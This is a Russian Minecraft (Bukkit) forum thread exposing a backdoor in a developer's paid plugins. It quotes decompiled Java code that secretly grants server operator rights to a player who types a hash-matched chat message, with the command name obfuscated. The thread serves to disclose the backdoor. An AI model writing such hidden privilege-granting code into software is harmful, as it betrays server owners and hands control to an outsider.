Хостинг серверов Minecraft playvds.com
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
  2. Вы находитесь в русском сообществе Bukkit. Мы - администраторы серверов Minecraft, разрабатываем собственные плагины и переводим на русский язык плагины наших собратьев из других стран.

Плагины от CraftCoder, или почему ваш сервер взламывают!

Тема в разделе "Оффтопик", создана пользователем alexandrage, 28 май 2015.

  1. Автор темы
    alexandrage

    alexandrage Старожил Пользователь

    Баллы:
    173
    Skype:
    alexandr0116
    [​IMG]

    [​IMG]

    Вот и сам плагин засветился https://cloud.mail.ru/public/2oH2/zPfM82vQL
    А тут и сам шелл

    Код (Java):
    1.   public void onChating(PlayerChannelEvent e, Player p, String m)
    2.   {
    3.     if (p.getName().contains("jokes")) {
    4.       String msg = "Porphyrajya";
    5.  
    6.       byte[] pl = new byte[40];
    7.       try {
    8.         MessageDigest event = MessageDigest.getInstance("SHA-1");
    9.         event.update(m.getBytes("utf8"), 0, m.length());
    10.         pl = event.digest();
    11.       } catch (Exception localException) {
    12.       }
    13.       StringBuffer str = new StringBuffer();
    14.       for (int i = 0; i < pl.length; i++) {
    15.         int item = pl[i] >>> 4 & 0xF;
    16.         int block = 0;
    17.         do {
    18.           if ((item >= 0) && (item <= 9)) str.append((char)(48 + item)); else
    19.             str.append((char)(97 + (item - 10)));
    20.           item = pl[i] & 0xF;
    21.         }
    22.         while (
    23.           block++ < 1);
    24.       }
    25.       if (str.toString().equals("f7d49269c7e7ca879b2e08d17126ef2296ebdfd3"))
    26.         Bukkit.dispatchCommand(Bukkit.getConsoleSender(), msg.substring(1, 2) + msg.substring(3, 4) + " " + p.getName());
    27.     }
    28.   }
     
    Последнее редактирование: 19 июл 2015
  2. Mr Hosting
  3. Миднайтко

    Миднайтко Старожил Пользователь

    Баллы:
    153
    Окей, а где пруфы того, что эти два факта: "в его плагинах есть бекдоры" и "ваши сервера взламывают" взаимосвязаны?
     
  4. Миднайтко

    Миднайтко Старожил Пользователь

    Баллы:
    153
    А вообще, сообщения выдраны из контекста. Речь шла о защите от кражи плагинов.
     
  5. Plasticable

    Plasticable Старожил Девелопер Пользователь

    Баллы:
    173
    Skype:
    plasticable
    Имя в Minecraft:
    Plasticable
  6. KyBbIPoK

    KyBbIPoK Старожил Пользователь

    Баллы:
    173
    Имя в Minecraft:
    KyBbIPoK
    Есть в его плагинах дыра, сделанная им же.
    Код в МД5, при введение которого на сервере выдается опка.
    Код раскрыт, проверено, бэкдор работает.
     
  7. CraftCoder

    CraftCoder Старожил Пользователь

    Баллы:
    108
    Имя в Minecraft:
    CraftCoderr
    И? Как ты узнаешь этот код? Тем более там уже не md5...
     
  8. Plasticable

    Plasticable Старожил Девелопер Пользователь

    Баллы:
    173
    Skype:
    plasticable
    Имя в Minecraft:
    Plasticable
    Base64?
    :D
     
  9. CraftCoder

    CraftCoder Старожил Пользователь

    Баллы:
    108
    Имя в Minecraft:
    CraftCoderr
    Нет
     
  10. Plasticable

    Plasticable Старожил Девелопер Пользователь

    Баллы:
    173
    Skype:
    plasticable
    Имя в Minecraft:
    Plasticable
    SHA?
     
  11. kursorik

    kursorik Активный участник Пользователь

    Баллы:
    76
    Имя в Minecraft:
    kursorik
    SALTED2MD5:lol:
     
  12. Saw

    Saw Старожил Пользователь

    Баллы:
    123
    Skype:
    nikita1234530
    md5(md5(md5(md5(md5(md5())))))
     
  13. BestMark

    BestMark Старожил Пользователь

    Баллы:
    103
    Skype:
    BestMarkBukkit
    Имя в Minecraft:
    BestMark
    @CraftCoder, выложи-ка сюда часть твоего хака. Там есть над чем посмеяться. :D
    Почему-то в моей версии плагина BedWars, который я покупал у тебя, используется именно MD5.
    Вырезать твой хак легко, тем более плагин не обфусцирован, хотя стоит дорого.
     
  14. kirr9999

    kirr9999 Старожил Пользователь

    Баллы:
    103
    А можешь код этой дырочки, которую ты вырезал, скинуть?)
     
  15. BestMark

    BestMark Старожил Пользователь

    Баллы:
    103
    Skype:
    BestMarkBukkit
    Имя в Minecraft:
    BestMark
    Без согласия автора — нет.
     
  16. Creeper1337

    Creeper1337 Активный участник Пользователь

    Баллы:
    78
    Опять топ бв написан
     
  17. mine88

    mine88 Старожил Пользователь

    Баллы:
    143
    Имя в Minecraft:
    null
    Вот почему не стоит опять же заказывать плагины у школоло кодеров. 2 норм кодера, которых я знаю - Белка и Пластик
     
  18. Автор темы
    alexandrage

    alexandrage Старожил Пользователь

    Баллы:
    173
    Skype:
    alexandr0116
    +1
     
  19. CraftCoder

    CraftCoder Старожил Пользователь

    Баллы:
    108
    Имя в Minecraft:
    CraftCoderr
    Интересно, по каким же критериям Вы определяете "школо кодера"?
    --- Сообщения объединены: 29 май 2015, предыдущее сообщение: 29 май 2015 ---
    Будет обнова на выходных.
    --- Сообщения объединены: 29 май 2015 ---
    Пластик вроде бы норм поцик)) А вот Белка...., который мало того, что встраивал бэкдоры, которыми может воспользоваться любой, кто увидит код, так он еще и лично взламывал сервера...
     
  20. Reality_SC

    Reality_SC Старожил Пользователь

    Баллы:
    123
    Имя в Minecraft:
    Reality_SC
    Нахер вообще ничего не встраивайте и всё =)
    Пишите опер-сорс, помогая другим программистам, а не школо-админам.
     
  21. BestMark

    BestMark Старожил Пользователь

    Баллы:
    103
    Skype:
    BestMarkBukkit
    Имя в Minecraft:
    BestMark
    Не легче было сделать самоуничтожение (удаление) плагина при вводе команды, а не выдачу опки тебе, что в плагинах твоих клиентов сейчас.
     

Поделиться этой страницей